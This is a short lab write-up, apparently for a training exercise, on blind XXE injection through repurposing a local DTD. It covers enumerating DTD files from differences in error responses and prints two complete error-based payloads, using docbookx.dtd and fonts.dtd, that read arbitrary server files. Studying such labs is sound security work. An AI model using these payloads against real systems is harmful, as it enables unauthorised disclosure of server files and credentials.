Exploiting XXE to retrieve data by repurposing a local DTD

Exploitation

the lab has a "check stock" feature that parses XML input

send to repeater

it does not display the result, which indicates that this is a blind XXE injection.

also the out-of-band techniques do not work.

To exploit blind XXE injection, we could leverage a local DTD.

When to use a local DTD

We can declare and reference Entities but we can't exfiltrate data in-band
Egress filtering prevents out-of-band calls to our server

A local DTD is a DTD file that already exists on the target server. we leverage this DTD file by causing an error to exfiltrate data.

Enumerating DTD files

locating existing files returns an error

locating non existing files returns no such file or directory

so the variance in application response allows us to enumerate existent vs non-existent DTD files.

so let's send the request to intruder and check againt a list of common DTDs

here is a link for an awesome list by GoSecure

in this resource you can find xxe payloads for each DTD

let's use the docbookx.dtd xxe payload

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

    <!ENTITY % ISOamsa '
        <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        '>

    %local_dtd;
]>
<message></message>

also we can use the fonts.dtd xxe payload

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % constant 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message></message>